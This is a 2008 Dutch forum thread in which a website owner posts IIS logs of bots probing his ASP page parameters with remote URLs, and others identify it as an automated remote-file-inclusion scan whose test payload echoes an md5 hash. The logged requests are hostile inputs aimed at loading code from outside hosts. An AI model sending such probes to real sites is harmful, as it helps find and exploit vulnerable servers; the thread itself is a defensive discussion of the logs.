Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

[W2K3 IIS] Vreemde Visitors/ Bots

Pagina: 1
Acties:

dinsdag 5 februari 2008 10:57

Acties:
  • SierdW
  • Registratie: April 2004
  • Laatst online: 23-09 12:48

SierdW

Topicstarter
Sinds een paar maanden heb ik mijn website zo geconfigureerd dat hij pagina's dymanisch laadt via een index.asp?page=home constructie. Dit heb ik afgeschermd door een pagina te includen die aangeeft welke variabelen allemaal mogelijk zijn, zo zijn bijvoorbeeld home, stats, specs legitiem en kunnen worden uitgevoerd.

De laatste dagen gebeurd het echter steeds vaker dat bezoekers/ bots langskomen en proberen sites te openen die niet eens op mijn server aanwezig zijn. Als ik zelf naar de site surf krijg ik hetvolgende te zien:

<?php echo md5("just_a_test");?>

Het lijkt me dus duidelijk dat ze op een of andere manier op zoek zijn naar een zwakte in mijn programmering, maar voor zover ik weet gebeurd er niks en genereert mijn server gewoon een foutmelding dat de variabele niet kan worden geladen.

Via google ben ik er achter gekomen dat er inmiddels meer personen zijn die dit soort rare meldingen tegenkomen in hun logs.

Voor zover ik weet kan dit geen kwaad, maar ik ben benieuwd wat jullie ideeen over deze meldingen zijn.

Hieronder staat een deel van mijn IIS log:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2008-02-05 08:43:30
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status 
2008-02-05 09:24:47 10.0.0.152 GET /indexn.asp - 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 302 0 0
2008-02-05 09:24:47 10.0.0.152 GET /indexn.asp page=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:47 10.0.0.152 GET /indexn.asp page=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:47 10.0.0.152 GET /indexn.asp page=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:47 10.0.0.152 GET /indexn.asp page=home 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:47 10.0.0.152 GET /includes/counter.asp page=stepreg&redirect=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:47 10.0.0.152 GET /includes/counter.asp page=stepreg&redirect=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:48 10.0.0.152 GET /includes/counter.asp page=stepreg&redirect=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fupu%2Fohoqoh%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:48 10.0.0.152 GET /includes/counter.asp page=stepreg&redirect=stepreg 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 302 0 0
2008-02-05 09:24:48 10.0.0.152 GET /indexn.asp page=stats 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:48 10.0.0.152 GET /asp/show_stats.asp showstats=http%3A%2F%2Fwww.feliciano.de%2FWebgalerie%2Fbilder%2FItaly%2Fune%2Fyiwul%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:48 10.0.0.152 GET /asp/show_stats.asp showstats=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:48 10.0.0.152 GET /asp/show_stats.asp showstats=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 09:24:49 10.0.0.152 GET /asp/show_stats.asp showstats=MGR 80 - wh-www11.xs4all.nl Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0

dinsdag 5 februari 2008 11:10

Acties:
  • sanfranjake
  • Registratie: April 2003
  • Niet online

sanfranjake

Computers can do that?

(overleden)
Source-ip is 10.0.0.152, dus een van je eigen interne pc's.

Mijn spoorwegfotografie
Somda - Voor en door treinenspotters

dinsdag 5 februari 2008 11:16

Acties:
  • SierdW
  • Registratie: April 2004
  • Laatst online: 23-09 12:48

SierdW

Topicstarter
Nee, 10.0.0.152 is ip van de server, waar hij op luistert. Client is wh-www11.xs4all.nl ofwel 194.109.22.106. Maar dergelijke bezoeken worden ook door andere ip's gelogd.

Het vreemde is dat de pagina niet volledig wordt geladen, afbeeldingen etc worden niet geladen. Als ik in regel 1 van de indexn.asp zet dat hij moet redirecten naar hack.asp als de page= begint met http dan wordt dit ook niet uitgevoerd... Erg vreemd...

Visual Basic:
1

if left(Request.QueryString("page"),4)="http" then response.redirect "hack.asp"

[ Voor 58% gewijzigd door SierdW op 05-02-2008 14:01 ]

dinsdag 5 februari 2008 15:46

Acties:
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

SierdW schreef op dinsdag 05 februari 2008 @ 11:16:
Nee, 10.0.0.152 is ip van de server, waar hij op luistert. Client is wh-www11.xs4all.nl ofwel 194.109.22.106. Maar dergelijke bezoeken worden ook door andere ip's gelogd.
Ik neem aan dat je bedoelt : vanaf andere client IPs gelogd?
En heb je XS4All ook al op de hoogte gesteld?

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

dinsdag 5 februari 2008 15:56

Acties:
  • SierdW
  • Registratie: April 2004
  • Laatst online: 23-09 12:48

SierdW

Topicstarter
alt-92 schreef op dinsdag 05 februari 2008 @ 15:46:
[...]

Ik neem aan dat je bedoelt : vanaf andere client IPs gelogd?
En heb je XS4All ook al op de hoogte gesteld?
Klopt, dat bedoel ik. XS4All heb ik al gemaild, maar daar krijg ik een standaard antwoord terug:
Thank you for your report. XS4ALL takes all such security related incidents extremely seriously and have taken the appropriate action in accordance with our terms of use. If you continue to see probes from this, or other XS4ALL systems, please let us know and we will investigate further at that time.

Our apologies for the inconvenience that this event has caused.

With kind regards,

--
Scott A. McIntyre
XS4ALL Internet B.V.
Inmiddels is de volgende bezoeker ook langs geweest:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2008-02-05 14:34:58
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status 
2008-02-05 14:34:58 10.0.0.152 GET /indexn.asp - 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 302 0 0
2008-02-05 14:34:58 10.0.0.152 GET /indexn.asp page=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fsexes%2Fafacub%2F 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 14:34:58 10.0.0.152 GET /indexn.asp page=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 14:34:59 10.0.0.152 GET /indexn.asp page=http%3A%2F%2Fwww.fabcraft.co.uk%2Fforum%2Flovuqo%2Fzil%2F 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 14:34:59 10.0.0.152 GET /indexn.asp page=home 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 14:34:59 10.0.0.152 GET /includes/counter.asp page=beleggen&redirect=http%3A%2F%2Fwww.ce-cioceoforum.com%2Ftalk%2Ft1%2Froda%2Filubov%2F 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 14:35:00 10.0.0.152 GET /includes/counter.asp page=beleggen&redirect=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 14:35:00 10.0.0.152 GET /includes/counter.asp page=beleggen&redirect=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2008-02-05 14:35:00 10.0.0.152 GET /includes/counter.asp page=beleggen&redirect=beleggen 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 302 0 0
2008-02-05 14:35:02 10.0.0.152 GET /indexn.asp page=support 80 - judah.linuxnoc.net Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0

Zoeken bij google levert een hoop hits, maar wat er daadwerkelijk gebeurd weet niemand...

Ik heb toch ergens het idee dat er niks kan gebeuren, maar 100% zeker ben ik niet...

[ Voor 6% gewijzigd door SierdW op 05-02-2008 16:21 ]

dinsdag 5 februari 2008 16:03

Acties:
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Het lijkt op een worm-achtig iets.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

dinsdag 5 februari 2008 16:12

Acties:

Verwijderd

Tikje naar Beveiliging en Viruseen

woensdag 6 februari 2008 16:07

Acties:
  • BoGhi
  • Registratie: Juli 2002
  • Laatst online: 21-09 10:42

BoGhi

Zo te zien is dit ´alleen´ een geautomatiseerde test die kijkt of jouw site kwetsbaar is voor het ontvangen van uitvoerbare (php) code vanaf een andere site. De echo md5(..) lijkt me onschuldig, de exploit komt later als deze test gezien heeft dat je site kwetsbaar is. Had net zo goed zonder de md5 gekunt, maar dit trekt nu wel mooi de aandacht (gewild of ongewild)

Dus, inderdaad moet je de input die binnenkomt via de parameter controleren, zoals je al doet.

Programmers don't die. They GOSUB without RETURN

woensdag 6 februari 2008 19:50

Acties:
  • SierdW
  • Registratie: April 2004
  • Laatst online: 23-09 12:48

SierdW

Topicstarter
Geen zorgen over maken dus... Goed om te horen, je wordt dan toch wat onzeker als ze terug blijven komen, alsof er iets mogelijk is op mijn server :). Bedankt!
Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq